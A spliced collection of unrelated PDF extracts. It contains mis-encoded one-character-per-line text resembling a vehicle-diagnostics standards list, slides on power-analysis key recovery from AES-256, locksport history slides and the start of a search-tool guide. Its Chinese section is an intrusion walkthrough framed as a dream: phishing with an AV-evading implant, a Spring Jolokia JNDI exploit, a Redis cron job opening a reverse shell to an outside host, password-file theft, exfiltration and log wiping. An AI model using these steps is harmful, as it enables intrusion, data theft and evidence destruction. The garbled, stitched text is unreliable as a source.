È
V
_
c
o
p
q
j
]
S
`
R
}
Y
S
O
f
`
e
c
e
o
p
q
S
]
}
}
e
Z
`
W
T
^
T
`
Y
c
¦
g
¯
³
²
0
²
²
L
o
e
^
}
W
Y
`
Y
c
Y
v
T
U
Y
`
Q
V
`
S
]
}
}
e
Z
`
S
k
l
m
j
]
S
`
R
}
Y
O
@
K
Ã
A
C
A
D
A
À
#
E
Á
Á
A
Ã
C
¤
Q
Y
S
`
V
`
]
S
e
t
S
]
}
}
e
Z
`
t
e
Z
e
`
Q
Y
Z
}
Z
e
`
e
U
e
W
S
È
T
_
U
W
]
c
T
_
{
}
Z
e
}
Z
T
Y
`
V
Z
R
V
_
c
e
j
S
e
W
Y
`
Y
}
Z
e
`
e
U
e
W
S
È
T
S
c
Y
S
U
Z
T
j
Y
c
j
Y
W
e
r
O
h
w
L
í
ì
û
8
8
ø
þ
÷
M
¬
M
B
B
N
O
¬
M
B
P
Q
i
k
q
S
]
}
}
e
Z
`
T
S
T
_
U
e
^
}
W
Y
`
Y
c
]
Y
`
e
]
_
V
v
V
T
W
V
j
T
W
T
`
R
e
t
S
}
Y
U
O
M
«
0
I
F
¶
P
Q
i
P
b
V
_
c
P
b
d
j
]
S
}
Q
R
S
T
U
V
W
W
V
R
Y
Z
S
]
}
}
e
Z
`
Y
c
j
R
Q
V
Z
c
r
V
Z
Y
O
M
«
0
I
F
N
B
Q
m
~
u
h
S
U
V
_
`
e
e
W
T
^
}
W
Y
^
Y
_
`
Y
c
T
_
M
«
0
I
F
N
B
N
O
«
0
I
F
N
P
Q
m
~
u
h
c
T
V
{
_
e
S
`
T
U
`
Y
S
`
^
e
c
Y
S
T
^
}
W
Y
^
Y
_
`
Y
c
T
_
M
«
0
I
P
F
Q
l
p
§
u
¤
o
c
Y
£
_
T
`
T
e
_
S
M
«
0
I
F
B
,
F
O
«
0
I
F
B
,
O
«
0
I
F
B
,
M
O
«
0
I
F
B
,
°
Q
m
~
u
h
_
Y
`
r
e
Z
s
^
Y
S
S
V
{
Y
S
M
«
0
I
F
=
Q
u
V
`
V
W
T
_
s
S
Y
U
]
Z
T
`
R
M
«
0
I
°
Q
m
~
u
h
o
p
q
S
]
}
}
e
Z
`
M
¬
N
F
°
F
,
F
O
¬
N
F
°
F
,
O
¬
N
F
°
F
,
M
Q
k
l
m
j
]
S
t
e
Z
^
V
`
M
¬
F
°
M
P
,
F
O
¬
F
°
M
P
,
O
¬
F
°
M
P
,
M
O
¬
F
°
M
P
,
°
Q
k
l
m
j
]
S
t
e
Z
^
V
`
t
e
Z
h
n
i
v
Y
Q
T
U
W
Y
S
L
í
û
8
8
ø
þ
ò
ý
÷
÷
õ
8
ü
÷
ý
þ
L
!
L
I
/
²
S
`
T
W
W
r
e
Z
s
T
_
{
L
í
H
ý
ñ
û
8
8
ø
þ
÷
¤
Q
Y
t
e
W
W
e
r
T
_
{
}
Z
e
`
e
U
e
W
S
V
Z
Y
_
e
`
f
R
Y
`
g
S
]
}
}
e
Z
`
Y
c
O
¤
Q
Y
S
`
V
`
]
S
e
t
Y
V
U
Q
}
Z
e
`
e
U
e
W
T
S
{
T
v
Y
_
j
Y
W
e
r
O
H
²
J
H
I
J
0
¬
±
k
l
m
N
w
¡
a
N
¢
w
È
§
]
Z
e
}
Y
m
~
u
¦
¬
±
m
_
¢
~
e
V
Z
c
u
T
V
{
_
e
S
`
T
U
S
k
O
¹
I
µ
I
L
H
I
/
«
i
b
©
p
]
c
T
x
Z
e
]
}
%
¹
q
e
T
_
t
e
O
%
¹
F
F
i
p
x
N
w
w
h
¦
%
¹
P
P
P
i
b
v
Y
Z
S
T
e
_
e
t
k
l
m
N
n
h
a
¡
¢
N
È
k
l
m
N
n
h
a
¡
¢
h
È
k
l
m
N
n
h
a
¡
¢
a
È
k
l
m
N
n
h
a
¡
¢
n
O
P
e
S
S
T
j
W
R
`
Q
Y
S
V
^
Y
¦
®
x
Y
_
Y
Z
V
W
d
e
`
e
Z
S
«
$
$
p
S
S
Y
^
j
W
R
X
T
_
Y
u
V
`
V
X
T
_
s
O
x
d
v
Y
Q
T
U
W
Y
S
N
|
h
¢
N
|
ª
¦
h
ª
®
0
¸
<
q
e
`
R
Y
`
T
_
v
Y
S
`
T
{
V
`
Y
c
O
®
L
I
³
L
J
L
±
L
²
R
L
H
I
:
q
e
`
R
Y
`
T
_
v
Y
S
`
T
{
V
`
Y
c
O
H
²
¸
²
´
¯
q
e
`
R
Y
`
T
_
v
Y
S
`
T
{
V
`
Y
c
O
S
D
¼
D
Ã
D
B
D
D
E
l
p
§
N
|
w
¡
l
p
§
N
|
w
¡
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
S
q
Y
`
r
e
Z
s
k
_
`
Y
Z
t
V
U
Y
l
p
§
N
ª
h
l
p
§
N
ª
h
1
u
T
V
{
_
e
S
`
T
U
o
e
_
_
Y
U
`
e
Z
l
p
§
N
y
|
l
p
§
N
y
|
1
m
~
u
k
k
l
U
V
_
¤
e
e
W
l
p
§
N
y
l
p
§
N
y
1
§
©
§
u
T
V
{
_
e
S
`
T
U
¤
Y
S
`
d
e
c
Y
S
l
p
§
h
¡
N
h
l
p
§
h
¡
N
h
1
[
Y
U
e
^
^
Y
_
c
Y
c
P
Z
V
U
`
T
U
Y
t
e
Z
u
T
V
{
_
e
S
`
T
U
¤
Z
e
]
j
W
Y
o
e
c
Y
u
Y
£
_
T
`
T
e
_
S
l
p
§
h
N
y
|
¢
N
l
p
§
h
N
y
|
¢
N
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
q
Y
`
r
e
Z
s
d
Y
S
S
V
{
Y
S
1
u
Y
`
V
T
W
Y
c
z
Y
V
c
Y
Z
¥
e
Z
^
V
`
S
V
_
c
P
Q
R
S
T
U
V
W
p
c
c
Z
Y
S
S
p
S
S
T
{
_
^
Y
_
`
S
l
p
§
h
N
y
|
¢
h
l
p
§
h
N
y
|
¢
h
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
q
Y
`
r
e
Z
s
d
Y
S
S
V
{
Y
S
1
u
V
`
V
P
V
Z
V
^
Y
`
Y
Z
u
Y
£
_
T
`
T
e
_
S
l
p
§
h
N
y
|
¢
a
l
p
§
h
N
y
|
¢
a
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
q
Y
`
r
e
Z
s
d
Y
S
S
V
{
Y
S
1
¥
Z
V
^
Y
k
u
S
t
e
Z
l
T
_
{
W
Y
¢
~
R
`
Y
¥
e
Z
^
S
e
t
z
Y
V
c
Y
Z
S
l
p
§
h
N
y
|
¢
n
l
p
§
h
N
y
|
¢
n
1
o
W
V
S
S
~
u
V
`
V
o
e
^
^
]
_
T
U
V
`
T
e
_
q
Y
`
r
e
Z
s
d
Y
S
S
V
{
Y
S
1
d
Y
S
S
V
{
Y
u
Y
£
_
T
`
T
e
_
S
t
e
Z
¤
Q
Z
Y
Y
~
R
`
Y
z
Y
V
c
Y
Z
S
l
p
§
h
N
|
ª
l
p
§
h
N
|
ª
1
§
©
§
u
V
`
V
X
T
_
s
l
Y
U
]
Z
T
`
R
l
p
§
h
N
¡
l
p
§
h
N
¡
1
§
_
Q
V
_
U
Y
c
§
©
§
u
T
V
{
_
e
S
`
T
U
¤
Y
S
`
d
e
c
Y
S
l
p
§
h
h
|
n
l
p
§
h
h
|
n
1
z
T
{
Q
¢
l
}
Y
Y
c
o
p
q
f
z
l
o
g
t
e
Z
i
Y
Q
T
U
W
Y
p
}
}
W
T
U
V
`
T
e
_
S
V
`
w
¡
¡
~
P
l
k
l
m
N
n
N
¢
N
k
l
m
N
n
N
¢
N
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
[
Y
\
]
T
Z
Y
¢
^
Y
_
`
S
t
e
Z
T
_
`
Y
Z
U
Q
V
_
{
Y
e
t
c
T
{
T
`
V
W
T
_
t
e
Z
^
V
`
T
e
_
k
l
m
N
n
N
¢
h
k
l
m
N
n
N
¢
h
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
h
o
p
[
~
Z
Y
\
]
T
Z
Y
^
Y
_
`
S
t
e
Z
T
_
`
Y
Z
U
Q
V
_
{
Y
e
t
c
T
{
T
`
V
W
k
l
m
N
n
N
¢
a
k
l
m
N
n
N
¢
a
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
¢
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
a
i
Y
Z
T
¢
£
U
V
`
T
e
_
e
t
`
Q
Y
U
e
^
^
]
_
T
U
V
`
T
e
_
j
Y
`
r
Y
Y
_
v
Y
Q
T
U
W
Y
V
_
c
m
~
u
k
k
S
U
V
_
`
e
e
W
h
y
k
l
m
N
n
h
a
¡
¢
N
k
l
m
N
n
h
a
¡
¢
N
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
N
P
Q
R
S
T
U
V
W
X
V
R
Y
Z
k
l
m
N
n
h
a
¡
¢
h
k
l
m
N
n
h
a
¡
¢
h
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
h
u
V
`
V
X
T
_
s
X
V
R
Y
Z
k
l
m
N
n
h
a
¡
¢
a
k
l
m
N
n
h
a
¡
¢
a
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
a
p
}
}
W
T
U
V
`
T
e
_
X
V
R
Y
Z
k
l
m
N
n
h
a
¡
¢
n
k
l
m
N
n
h
a
¡
¢
n
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
u
T
V
{
_
e
S
`
T
U
l
R
S
`
Y
^
S
1
P
V
Z
`
n
[
Y
\
]
T
Z
Y
^
Y
_
`
S
t
e
Z
Y
^
T
S
S
T
e
_
¢
Z
Y
W
V
`
Y
c
S
R
S
`
Y
^
S
¤
k
p
¢
h
a
h
¤
k
p
¢
h
a
h
1
k
_
`
Y
Z
t
V
U
Y
~
Y
`
r
Y
Y
_
u
V
`
V
¤
Y
Z
^
T
_
V
W
§
\
]
T
}
^
Y
_
`
V
_
c
u
V
`
V
o
T
Z
U
]
T
`
¢
¤
Y
Z
^
T
_
V
`
T
_
{
§
\
]
T
}
^
Y
_
`
§
^
}
W
e
R
T
_
{
l
Y
Z
T
V
W
~
T
_
V
Z
R
u
V
`
V
k
_
`
Y
Z
U
Q
V
_
{
Y
k
§
§
§
N
h
|
n
k
§
§
§
N
h
|
n
1
l
`
V
_
c
V
Z
c
l
T
{
_
V
W
T
_
{
d
Y
`
Q
e
c
t
e
Z
V
~
T
c
T
Z
Y
U
`
T
e
_
V
W
P
V
Z
¢
V
W
W
Y
W
P
Y
Z
T
}
Q
Y
Z
V
W
k
_
`
Y
Z
t
V
U
Y
t
e
Z
P
Y
Z
S
e
_
V
W
o
e
^
}
]
`
Y
Z
S
n
o
¥
[
w
ª
w
·
_
T
`
Y
c
l
`
V
`
Y
S
o
e
c
Y
e
t
¥
Y
c
Y
Z
V
W
[
Y
{
]
W
V
`
T
e
_
S
È
¤
T
`
W
Y
n
È
i
e
W
]
^
Y
w
È
P
V
Z
`
w
ª
w
1
i
Y
Q
T
U
W
Y
k
c
Y
_
`
T
£
U
V
`
T
e
_
q
]
^
j
Y
Z
[
Y
\
]
T
Z
Y
^
Y
_
`
S
k
l
m
a
y
y
k
l
m
a
y
y
1
[
e
V
c
i
Y
Q
T
U
W
Y
S
1
i
Y
Q
T
U
W
Y
T
c
Y
_
`
T
£
U
V
`
T
e
_
_
]
^
j
Y
Z
f
i
k
q
g
1
o
e
_
`
Y
_
`
V
_
c
S
`
Z
]
U
`
]
Z
Y
k
l
m
a
y
|
¡
k
l
m
a
y
|
¡
1
[
e
V
c
v
Y
Q
T
U
W
Y
S
1
b
e
Z
W
c
^
V
_
]
t
V
U
`
]
Z
Y
Z
T
c
Y
_
`
T
£
Y
Z
f
b
d
k
g
U
e
c
Y
h
| | pdf |
Correlation Power Analysis
of AES-256 on ATmega328P
1
游世群 JPChen 許遠哲
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
2
hidden in an
encryption algorithm.
Hardware
key
Side-Channel Analysis
Plaintext
Ciphertext
• There is a key
• We need a hardware to
implement this system.
• This hardware may leak
information about the key.
• By analyzing the leakages,
we can rebuild the key.
3
Encryption
Algorithm
Differential Power Analysis
Compare two power traces from two different encryptions:
Differential Power Analysis (DPA)
• By analyzing the difference
between traces from different
encryptions.
• Use statistical tools to recover
the key.
4
• AES is a block cipher.
• 1 byte as a unit.
• Plaintexts, Round Keys,
Ciphertexts and Intermediate
values can be regarded as
16 independent bytes.
Divide and Conquer
12 43 F5 68
77 26 54 87
A3 B3 7E FF
9B 4A AF E8
A Block of AES
Search Space: reduced from to
5
Power Consumption in Register
0x00
0 0 0 0 0 0 0 0
0xc3
1 1 0 0 0 0 1 1
4 bits change
A register.
Assume that each bit changes costs the same value b,
the overall power consumption y will be:
y = a + HD(0x00, 0xc3)·b + N
Hamming Distance of these 2 hex-numbers
6
0x00
0 0 0 0 0 0 0 0
Power Consumption in Register
0x6d
0 1 1 0 1 1 0 1
0xc3
1 1 0 0 0 0 1 1
0 1 1 0 1 1 0 1
1 1 0 0 0 0 1 1
• Hamming Distance model:
y = a + HD(0x6c, 0xc3)·b + N
0xc3
1 1 0 0 0 0 1 1
• Hamming Weight model:
y = a + HW(0xc3)·b + N
7
Leakages from AES
T0: y0 = a + H( f5(p0,k) )·b + N
T1: y1 = a + H( f5(p1,k) )·b + N
T2: y2 = a + H( f5(p2,k) )·b + N
⋮︙
Tn: yn = a + H( f5(pn,k) )·b + N
y = a + HD(0x00, 0xc3)·b + N
8
Leakages from AES
T0: y0 = a + H( f5(p0,k) )·b + N
T1: y1 = a + H( f5(p1,k) )·b + N
T2: y2 = a + H( f5(p2,k) )·b + N
⋮︙
Tn: yn = a + H( f5(pn,k) )·b + N
k: key
pi : known plaintext
fi : the i-th Intermediate
value function
H: Hamming Distance
or Hamming Weight
9
Correlation Power Analysis
T0: y0 = a + H( f5(p0,k) )·b + N
T1: y1 = a + H( f5(p1,k) )·b + N
T2: y2 = a + H( f5(p2,k) )·b + N
⋮︙
Tn: yn = a + H( f5(pn,k) )·b + N
If our key guessing is right,
Cor(y, x) will be significant.
If it is wrong,
Cor(y, x) will be close to 0.
Pearson Correlation Coefficient:
10
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
11
ATMega328P
https://www.arduino.cc/en/Main/ArduinoBoardUno
12
ChipWhisperer
ChipWhisperer board
1. control FPGA
2. OpenADC
MultiTarget board
1. micro controller
2. card socket
3. FPGA
13
Hardware Implementation
14
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
15
Demo Video
16
3a cd 58 34 26 59 74 95 17 98 8a 73 44 77 52 54 73 45 f7 ee ec bb ae 67 98 87 07 45 00 37 42 66
Demo Video
17
3a cd 58 34 26 59 74 95 17 98 8a 73 44 77 52 54 73 45 f7 ee ec bb ae 67 98 87 07 45 00 37 42 66
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
18
CPA on One Round of AES Encryption
12 43 F5 68
77 26 54 87
A3 B3 7E FF
9B 4A AF E8
Known Input
00
01
02
03
FF
⋮
Key Guess
12
00
Choose a byte
Choose a key guessing
19
5A 0C 6C FC
67 BE AF 60
42 FF C3 51
6E 23 0A A9
12
96
CPA on One Round of AES Encryption
⨁
00
45
⋮
5A
5A
Input N
20
6E
BE
C9
90
CPA on One Round of AES Encryption
12
96
45
5A
substitution box
⋮
S-box
compute their Hamming Weight
4
2
5
6
⋮
intermediate values X
⋮
power leakages Y
Compute their correlation coefficient of every point
• If there are any points with a significant Correlation
Coefficient value, the guessing key might be correct.
11001001
21
⋮
CPA on One Round of AES Encryption
12 43 F5 68
77 26 54 87
A3 B3 7E FF
9B 4A AF E8
Known Input
00
01
02
03
FF
⋮
Key Guess
01
Repeat 16 times for each bytes!
00
02
7B
FF
Choose another key
We should try every key
There will be a guess
key with a significant
correlation coefficient
22
Compare AES-256 with AES-128
Similarities:
• Block size is 128 bits, so as Round Key size.
Differences:
• 256-bit Master Key.
• 14 rounds while 10 rounds in AES-128.
k0: the first half (128 bits) of master key.
k1: the second half (128 bits) of master key.
23
2b 28 ab 09 a0
88 23 2a
f2
7a 59 73 3d 47 1e 6d
7e ae
f7
cf
fa
54 a3 6c c2
96 35 59 80
16 23 7a
15 de 15
4f
fe
2c 39 76 95 b9 80
f6
47
fe
7e 88
16 a6
88 3c 17 b1 39 05
f2
43 7a
7f
7d 3e 44 3b
Key Schedule of AES-128
2b 28 ab 09 11
7a 44 4a
f6
de 75 7c 01 7b
3f
75
7e ae
f7
cf
02
93
8f
93 03 ad 5a 95 28 bb 34 a7
15 de 15
4f
4e
0c ee 13 51
83 96 d9 7b 77 99 8a
16 a6
88 3c
f6
be 27 86 c0
66 ee d2 43
fd
da 5c
Key Schedule of AES-256
First Round is enough
Needs 2 Rounds
2b 28 ab 09
7e ae
f7
cf
15 de 15
4f
16 a6
88 3c
2b 28 ab 09 11
7a 44 4a
7e ae
f7
cf
02
93
8f
93
15 de 15
4f
4e
0c ee 13
16 a6
88 3c
f6
be 27 86
24
Compare AES-256 with AES-128
45 67 2A C4
78 CF AE 7A
BE 87 69 93
FF 0B 00 2C
12 43 F5 68
77 26 54 87
A3 B3 7E FF
9B 4A AF E8
45 67 2A C4
78 CF AE 7A
BE 87 69 93
FF 0B 00 2C
Plaintexts
Compute the Intermediate Values
X
traces
Y
CPA
Attacks on AES-128
25
Compare AES-256 with AES-128
45
67
2A
C4
78 C A 7
BE 8 6 9
FF 0 0 2
12
43
F5
68
77265487
A
3 B 7 F
9
B 4 A E
45
67
2A
C4
78
CF
AE
7A
BE
87
69
93
FF
0B
00
2C
This round key is the first-half key
Use it to compute the input of the next round
45
67
2A C4
78 C A 7
BE 8 6 9
FF 0 0 2
12
43
F5 68
77265487
A
3 B 7 F
9
B 4 A E
45
67
2A
C4
78
CF
AE
7A
BE
87
69
93
FF
0B
00
2C
33 26 EE 64
32 CF AE 7A
6C 87 69 93
C3 0B 00 2C
22 43 C3 68
54 26 54 87
EA B3 7E FF
89 4A AF E8
76 28 9A 53
0C EF B3 4A
56 54 00 96
7E C0 EE 2C
X
traces
Y
1 Round Encryption Results
This round key is the second-half key
26
Resynchronization and Alignment
• The variables we concern change vertically.
• Those horizontal shifts could be disturbances.
27
Resynchronization and Alignment
• Use some special pattern to align.
Call this special signal h[n]
28
Resynchronization and Alignment
• Method 1: Sum of Absolute Difference (SAD).
• If two N-points signals are similar, SAD will be small.
• Align the traces by minimizing the SAD.
29
Resynchronization and Alignment
• Method 2: Correlation based method.
• If two N-points signals are similar, correlation
coefficient will near to 1.
• Align the traces by maximizing the correlation
coefficient.
30
Resynchronization and Alignment
Before resynchronization
After resynchronization
31
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
32
CHES 2016 CTF
http://www.chesworkshop.org/ches2016/start.php
CHES 2016 CTF
https://ctf.newae.com/flags/
• Shuffling:
related to byte 0
35
Countermeasure (1)
related to byte 0
For trace 1:
related to byte 0
For trace 2:
36
• Adding Dummy:
byte 0
byte 1
byte 2
byte 3
byte 4
byte 5
byte 6
37
Countermeasure (2)
byte 0
byte 0
byte 1
byte 2
byte 3
byte 4
byte 1
byte 2
byte 3
Trace 1
Trace 2
38
Countermeasure (2)
Outlines
• SCA/DPA/CPA
• Hardware Implementation
• Demo Video
• CPA Implementation on AES Rounds
• Countermeasures
• Conclusion
39
Conclusion
• With more statistical techniques applied, SCA is more
powerful than ever.
40
• Encryption systems could be insecure without any
protections from SCA.
• SCA protections should be taken into account when
using microcontrollers like ATmega328P and their
applications in IoT.
Reference
• S.Mangard et al. Power Analysis Attacks.
• Colin O’flynn ChipWhisperer.
http://www.newae.com/sidechannel/cwdocs/
• CHES CTF 2016
https://ctf.newae.com
• Papers from CHES, Eurocrypt, Crypto and Asiacrypt
• Arduino
https://www.arduino.cc
• Atmel
http://www.atmel.com
41 | pdf |
0x00 前⾔
如有技术交流或渗透测试/代码审计/红队⽅向培训/红蓝对抗评估需求的朋友
欢迎联系QQ/VX-547006660
前两天在国企的朋友遇到了⼀个棘⼿的靶标,听说之前没⼈能从外⽹打点进去,只能靠万⾥防⽕墙取证
我⼀听来了兴趣,在梦中臆造了⼀个靶场进⾏渗透,并且该梦境已获得相关授权
还请各位看官请勿对号⼊座,如有雷同,纯属巧合
0x01 钓⻥打点
官⽹发现了客服联系⽅式
通过修改 shellcode特征的CS + 免杀加载器,直接做出免杀
。
改后缀名为⾮exe(懂的都懂),直接⽤话术钓⻥客服(现在客服都聪明了,直接exe是肯定钓不到的),获得其桌⾯记
事本
记事本中翻出来了后台地址,但是并没有账号密码(有也没有⽤,因为有Google验证码)
http://xxxxx/xxxxx-admin/
0x02 FUZZ得到Spring Actuator泄露,并分析信息
FUZZ了⼀下,出了⼆级⽬录Spring Actuator的泄露
http://xxxxx/xxxxx-admin/actuator/
发现了⽼朋友jolokia
jolokia组件,熟悉Spring测试的兄弟都知道,不出意外可以直接秒~
⼜访问了⼏个常⻅的端点
http://xxxxx/xxxxx-admin/actuator/env
通过env端点可知,该后台托管在亚⻢逊云,并且没有泄露ak,sk等信息
翻来覆去,只看到有个redis的密码
看了下beans端点,并没有找到能⽤来直接dump出星号密码的合适Mbean,所以放弃直接通过jolokia调⽤
mbean获取明⽂
http://xxxxx/xxxxx-admin/actuator/heapdump
通过下载heapdump,进⼊Mat分析
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
调试后发现redis配置的链接地址是127.0.0.1,密码为空,但是并没有开放端⼝外链,那只能先留着了
0x03 Jolokia Realm JNDI注⼊ rce
https://xxxx/xxxxx-admin/actuator/jolokia/
根据得到jolokia端点
直接RCE打试试
利⽤条件为:
⽬标⽹站/jolokia/list 接⼝存在 type=MBeanFactory 和 createJNDIRealm 关键词
请求可出外⽹
命令编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html
编码反弹Shell的命令
⽤JNDI-Injection-Exploit直接起个恶意Rmi服务
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "command" -A vps_ip
直接修改好脚本
https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-realm-jnd
i-rce.py
运⽓不错,⽬标出⽹,直接秒了
www权限
0x04反弹shell后的取证
history,last、hosts,中间件⽇志等常规取证就不说了
⽬标的运维还是⽐较谨慎的,没有直连,⽽是以⼀台亚⻢逊云的主机为跳板进⾏SSH链接
进程看了⼀下,web程序⽤的是MVC架构
0x05 注⼊内存
为了防⽌反弹的Shell随时GG,所以选择注个内存⻢到Tomcat
⽐较恶⼼的是⽬标⽤的MVC架构,路由默认都是直接302跳转后台的路由,导致不少内存⻢没法直接⽤,时间紧
急,去Git翻了⼀个
https://github.com/WisteriaTiger/JundeadShell
直接受控机梭哈
挂上Burp访问靶标,找到了个不302跳转的接⼝,加上密码,访问内存⻢成功
0x06 借⽤redis权限提升
⽬标为www权限,⽽且⽤的亚⻢逊云,及时打了补丁,最近的番号pkexec,dirty pipe等测试后不好使,脏⽜等⽼
古董更不⾏
GUID,SUID查了⼀遍,没有误配
最后都快放弃的时候看了⼀眼进程,redis是以root权限运⾏的...天助我也
wget x.x.x.x:50000/agent_starter.jar
nohup java -jar agent_starter.jar "java_process_name" 8 &
直接通过端⼝转发程序把redis的端⼝转发到本地
利⽤redis写计划任务
(PS:Ubuntu下会因为夹杂了脏数据导致语法⽆法识别⽽任务失效;但对于centos系统则没有影响,可以成功被利
⽤,靶标为centos)
nc监听本地,没过⼀会,root权限的shell就弹回来了
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xx.xx.xx.xx/4444 0>&1\n\n"|redis-cli
-h xx.xx.xx.xx -x set 1 #设定值
redis-cli -h xx.xx.xx.xx config set dir /var/spool/cron/
redis-cli -h xx.xx.xx.xx config set dbfilename root
redis-cli -h xx.xx.xx.xx save
随后⼜把shadow导出,取证了root⽤户⽬录下的部分东⻄,做了部分权限维持
0x07 ⽂件取证资料回传
把取证好的⽹站Jar包,⽬录⽇志,登陆⽇志打包好,⾜⾜有⼏个G,回传⽂件成了难事
尝试了nc,后⻔回传等均不稳定中途回传断掉,⾃⼰的oss那时候也过期了,没法通过oss回传,难受的⼀逼..
tar -cvf xxxx.tar *
最终问了下⼩圈⾥的师傅,提供了⼀个好⽤的思路
利⽤奶⽜快传回传⽂件
https://github.com/Mikubill/cowtransfer-uploader
速度很舒服,⼤概上传速度能到每秒6M
随后直接去⾃⼰的奶⽜快传下载即可
0x08 资料分析
把回传回来的jar包反编译,取证其中的数据库链接信息,等待下步指示
nohup ./cowtransfer-uploader -c "remember-mev2=...;" -a "<cow-auth-token>" xxx.tar
分析程序记录的Log⽇志,后台登陆信息、账号、登陆IP尽收眼底;站在暗处的违法分⼦命不久矣
0x09 擦屁股与后⾔
随后把web当⽇⽇志,history,/var/log下的⽇志全部清理⼲净
⽤到的⼯具全部wipe删掉
断掉shell链接的⼀瞬间,我醒了,发现这⼀切竟是我在做梦 | pdf |
Locksport
An Emerging Subculture
Intro and History
• Locks
• Lockpickers
Locks
• Egyptian Pin Tumbler
• Medieval Artistry
• Puzzle Locks
• Modern Advances
– Pin Tumbler Sidebar
– Wafer Lock
– Disc Lock
– Lever Lock
Lockpickers
• Pre-locks (the thief knot)
• Wax pad attack
• Similarity of keys
• Brahma Vs. Hobbs
– Great Exhibition
– Unsupervised?
– Still controversy
– Media Coverage
Modern Lockpicking
• TOOOL NL
• SSDEV (Germany)
• The Dutch and German competitions
• “Coming to America” (TOOOL US & LI)
• DEFCON / HOPE
The Open Organisation Of Lockpickers
• Originated from the NVHS (Dutch Association for Door
Hardware Sport )
• Currently have several chapters and ~100 members.
• Struggles with manufacturers
• Developed relationships with many Lock firms:
– Wink Haus
– Assa Abloy
– Geminy
– RKS
• Han Fey, lock collector
• Dutch Open
SSDEV
• Steffan Wernery in 1997
• First major established organization
• Set out to provide a firm ethical foundation for
the sport
• Host competition in Berlin
• Recently made the English language transition
• Top pickers in the world
• Over 1000 current members in ~ 10 chapters
• Proposed a lockpicking olympics
The German/Dutch Opens
• 1997 in Hamburg, DE
• 23 attempted in 1997
• 2002 in Sneek, NL
• 50 attempted in 2006
• Prizes
• 2007 dates
Coming To America!
• TOOOL establishes first US chapter in 2002
• Josh Nekrep, Kim Bohnet, and Devon McDormand form
Locksport International in 2005
• Eric Michaud, Babak Javadi, Eric Schmeidl, and
Schuyler Towne form TOOOL US in 2006
• TOOOL current membership
• LI current membership
• To merge or not to merge
• Differences
• Press
DEFCON / HOPE
• Con within a Con
• LP Village
• Other conferences that feature locksport
• Developed from this community
• Will always have common ties
The Internet
• Forums
• YouTube
• Blogs
Forums
• Lockpicking101.com
– Black Hat
– LI develops
– Constant ethical debate
– Division of material
• EZPicking.com
– Anti-LP101
– No division of material
– Limited talent
• Bump Key Specific Forums
– Limited info
– Hopefully becoming obsolete
YouTube
• Lockpicking is a visual sport
• YouTube can be a convenient teaching tool
• Allows one ignorant person to propagate that ignorance
• Lot of people don’t know how their lock has opened
• Sketchy people out there…
• Giving us a bad name
• Example 1
• Example 2
Blogs
• Marc Weber Tobias
– Security.org
– LSS+
• Barry Wels
– Blackbag
– Secondary interests
• Other blogs
– Locks and security
– Discreet Security Solutions
Why Locksport Matters
• (in)Security through obscurity
• Media representation
• Lock design
(in)Security through obscurity
• Unique locks were the standard
• Inconsistent quality
• Mass production led to standardization
• Standardization = consistent attack vectors
• Manufacturers still insist on secrecy over
security
The Media
• Double Edged Sword
• Talented locksmiths are revered…
• Talented lockpickers are a reason for worry
• Wired Magazine at the Dutch Open
• Wall Street Journal
• Local news scare tactics
• The bumping phenomenon
• Competition bodes well for us
Lock Design
• Positive relationships with European groups
• Weiser / Kwikset smartkey & Master’s new pins
• The American bypass & “solution”
• SFIC sleeve improvements
• A staggering number of recent advancements
• Obvious influence
• Developing stateside relationships
Last Word
• Why we do it
– Professionals keeping up
– Related fields
– Puzzles
– Security evangelists
– Young field
– Constant challenges
– The hobbyist ideal
Thank you!
Schuyler Towne
[email protected]
NDE Magazine
TOOOL US | pdf |
Athena
A user’s guide
By Steve Lord
(A friend of Dave’s)
[email protected]
”You are no longer a child: you must put childish thoughts away."
[Athena to Telemachus. Homer, Odyssey 1.296]
Background
Athena was the Greek goddess of wisdom, war, the arts, industry,
justice and skill. She was the strongest supporter of Odysseus, and
regularly helped both him and his son Telemachus throughout the
Odyssey. Athena is also the name of a mighty fine Turkish band, but
that’s not important right now.
I’d been working on a poorly written search engine query tool for a
while when I heard about Foundstone’s SiteDigger. I decided to
expand it into something better, using a modified (yet semi-
compatible) form of the SiteDigger XML file format.
Requirements
Athena should work on any system with the .NET CLR runtime
installed. So far it’s been tested on various Windows XP systems with
.NET but 2000 should be fine. If anyone gets this working on Mono
